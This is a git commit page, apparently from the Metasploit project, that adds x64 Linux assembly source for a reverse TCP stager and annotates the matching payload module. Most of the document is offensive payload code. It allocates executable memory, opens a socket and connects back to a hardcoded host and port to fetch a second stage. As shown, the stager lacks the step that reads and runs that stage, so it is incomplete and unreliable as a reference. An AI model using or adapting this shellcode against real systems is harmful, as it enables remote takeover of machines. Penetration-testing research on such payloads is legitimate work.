add x64 stager_sock_reverse src
parent
0685cb5ab4
commit
084b211e9b
|
@ -0,0 +1,75 @@
|
|||
##
|
||||
#
|
||||
# Name: stager_sock_reverse
|
||||
# Qualities: -
|
||||
# Authors: nemo <nemo [at] felinemenace.org>, tkmru
|
||||
# License: MSF_LICENSE
|
||||
# Description:
|
||||
#
|
||||
# Implementation of a Linux reverse TCP stager for x64 architecture.
|
||||
#
|
||||
# Assemble with: gcc -nostdlib stager_sock_reverse.s -o stager_sock_reverse
|
||||
#
|
||||
# Meta-Information:
|
||||
#
|
||||
# meta-shortname=Linux Reverse TCP Stager
|
||||
# meta-description=Connect back to the framework and run a second stage
|
||||
# meta-authors=ricky, tkmru
|
||||
# meta-os=linux
|
||||
# meta-arch=x64
|
||||
# meta-category=stager
|
||||
# meta-connection-type=reverse
|
||||
# meta-name=reverse_tcp
|
||||
##
|
||||
|
||||
.text
|
||||
.globl _start
|
||||
_start:
|
||||
xor %rdi,%rdi
|
||||
pushq $0x9
|
||||
pop %rax
|
||||
cltd
|
||||
mov $0x10,%dh
|
||||
mov %rdx,%rsi
|
||||
xor %r9,%r9
|
||||
pushq $0x22
|
||||
pop %r10
|
||||
mov $0x7,%dl
|
||||
syscall
|
||||
test %rax, %rax
|
||||
js failed
|
||||
# mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC|0x1000, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)
|
||||
push %rsi
|
||||
push %rax
|
||||
pushq $0x29
|
||||
pop %rax
|
||||
cltd
|
||||
pushq $0x2
|
||||
pop %rdi
|
||||
pushq $0x1
|
||||
pop %rsi
|
||||
syscall
|
||||
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
|
||||
test %rax, %rax
|
||||
js failed
|
||||
xchg %rax,%rdi
|
||||
movabs $0x100007fb3150002,%rcx
|
||||
push %rcx
|
||||
mov %rsp,%rsi
|
||||
pushq $0x10
|
||||
pop %rdx
|
||||
pushq $0x2a
|
||||
pop %rax
|
||||
syscall
|
||||
# connect(3, {sa_family=AF_INET, LPORT, LHOST, 16)
|
||||
test %rax, %rax
|
||||
js failed
|
||||
pop %rcx
|
||||
|
||||
failed:
|
||||
pushq $0x3c
|
||||
pop %rax
|
||||
pushq $0x1
|
||||
pop %rdi
|
||||
syscall
|
||||
# exit(1)
|
|
@ -30,6 +30,7 @@ module MetasploitModule
|
|||
'LPORT' => [ 53, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
# Generated from external/source/shellcode/linux/x64/stager_sock_reverse.s
|
||||
"\x48\x31\xff" + # xor %rdi,%rdi
|
||||
"\x6a\x09" + # pushq $0x9
|
||||
"\x58" + # pop %rax
|
||||
|
|
Loading…
Reference in New Issue